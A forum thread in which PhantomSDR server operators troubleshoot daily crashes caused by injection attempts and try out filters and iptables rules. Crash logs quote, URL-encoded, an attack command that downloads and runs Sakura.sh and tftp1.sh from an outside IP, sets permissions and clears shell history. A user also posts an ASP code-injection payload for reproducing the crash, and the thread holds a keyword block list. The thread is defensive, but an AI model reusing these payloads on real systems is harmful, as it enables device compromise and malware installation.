Security Issue: code injection attack

[hb3xdc]

Hi

My instance crashes regularly with error:

terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
  what():  filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.73%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.73+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]


To me it looks like some sort of tried code injection attack. Anyone has an idea how to prevent this?

[Phil - NY4Q]

I have not seen that yet, but below is the script (I assume).

Code Select Expand

#!/bin/bash
## sakura
## version 0.0.1 - initial
##################################################
sakura() {
 true
}
##################################################
if [ ${#} -eq 0 ]
then
 true
else
 exit 1 # wrong args
fi
##################################################
sakura
##################################################
## generated by create-stub2.sh v0.1.2
## on Fri, 28 Jun 2019 17:24:34 +0900
## see <https://github.com/temptemp3/sh2>
##################################################

https://github.com/temptemp3/sakura.sh/blob/master/sakura.sh

[Bas ON5HB]

Yep it's injection alright:

https://github.com/netsecfish/tbk_dvr_command_injection

More info here:

https://nvd.nist.gov/vuln/detail/CVE-2024-3721

I would check the IP's they come from and ban them.

They try to write and execute a file on your filesystem as far as I can see. But I doubt anything happens apart from a crash.
Check your drive for filenames you see in the command.

[hb3xdc]

As much as I can see there is no file or so on the drive. IP is from UK and I already reported it. Is there any way to prevent this kind of stuff from beeing entered in to the system (they crash it daily with this) else im just gonna remove the chatbox

[Phil - NY4Q]

We can add some of the common extensions / commands to the bad word list. That should help.

You can add chmod, root, .sh, etc to the chat.cpp file then recompile the backend.

[Phil - NY4Q]

This will help :

Modify sendMessage() in App.svelte

Code Select Expand

function sendMessage() {
  newMessage = newMessage.replace(/[^\x00-\x7F]/g, ""); // Strips non-ASCII
  newMessage = stripText(newMessage);
    if (newMessage.trim() && username.trim()) {
      const messageObject = {
        cmd: "chat",
        message: newMessage.trim(),
        username: username,
      };
    socket.send(JSON.stringify(messageObject));
    newMessage = "";
    scrollToBottom();
  }
}

And add this function to App.svelte

Code Select Expand

function stripText(s) {
    let badStrings = ['777', 'chmod', '.sh', 'chown', 'tftp'];
    let fixedStrings = new RegExp('\\b(' + badStrings.join('|') + ')\\b', 'g');
    return (s || '').replace(fixedStrings, '').replace(/[ ]{2,}/, ' ');
}

I will add this to the current build now.

[hb3xdc]

Hi Phil
Thanks for the code, sorry had not much time last weeks but now tested it. It still has the same crash some bad guys trying to do this

terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
  what():  filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.37%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.37+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]

Any idea what I still could do?

[Bas ON5HB]

Are you sure it's an injection?
As I found this:

https://github.com/azerothcore/azerothcore-wotlk/issues/6889#issuecomment-878552846

Describing the problem.

So question is...what OS etc are you running? Was it compiled with the suggested OS? And compilers?

We have seen more problems when people use something different then Ubuntu 22.04

Why doesn't it happen to all others? And just you? It seems to come from device.rsp....could it be Soapy?

Not much info to go on beside you repeating the error but not telling us what you use, toml, start-stopr-script etc.

[hb3xdc]

You can reproduce it if you put any random stuff behinde the URL i found out

http://sardinia-sdr.ddns.net/%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))

and it crashes with the error

terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
  what():  filesystem error: status: File name too long [//%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))]

This happens on any phantom sdr instance i have but somebody is penetrating sardinia-sdr.ddns.net

Atm i have no idea how to prevent this from happening


If you want to try it just post the script from this page after a / behind url of your server and you will see it crashing
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection#:~:text=In%20Code%20Injection%20testing%2C%20a,%2C%20e.g.%2C%20ASP%20or%20PHP.

[Phil - NY4Q]

Thanks for posting that Gianni. I will try to look further into that, but I believe Bas is far beyond me in finding a solution.

[Bas ON5HB]

I have logged the issue:

*** longjmp causes uninitialized stack frame ***: terminate

OK, now to find the issue itself, I have some idea's....thanks for the data.

[Bas ON5HB]

Not either....but I know the problem now.

The first sign of the string is %3C% that equals to '<' and that is an injection code.

Ok, found a quick and dirty methode to stop it from happening, as the first is always %3C%....so we add to the webserver start-script this:

Code Select Expand

iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
Any URL that as %3C% in it will be blocked by the firewall, maybe it needs tuning, but it works!!!! YES!!!!!

Beware, if you restart a lot, it add's the same line over and over.

To stop that from happening, put this before the adding-line:

Code Select Expand

iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
Then it removes it first, then adds.

Make sure that 'iptables -L' lists the line first!!! Else it may not work or being overruled.

Best to kill/delete UFW, it's sort of useless.

[hb3xdc]

Thanks for your Research Bas, but for me its not working:

gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory

or with sudo:

gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).

[9a7aof]

Hi,

my Ubuntu 22.0.4

darko@buster:~$ sudo su
[sudo] lozinka za darko:
root@buster:/home/darko# iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
root@buster:/home/darko# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       all  --  anywhere             anywhere             STRING match  "%3C%" ALGO name bm TO 65535

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
root@buster:/home/darko#

and LMDE 6

root@Siemens:/home/websdr# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       all  --  anywhere             anywhere             STRING match  "%3C%" ALGO name bm

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
root@Siemens:/home/websdr#

Is this OK? 

[Phil - NY4Q]

Thanks for your Research Bas, but for me its not working:

gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory

or with sudo:

gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).

Just remove the deletion entry from your iptables script. It is trying to delete an entry that does not yet exist.

Code Select Expand

sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP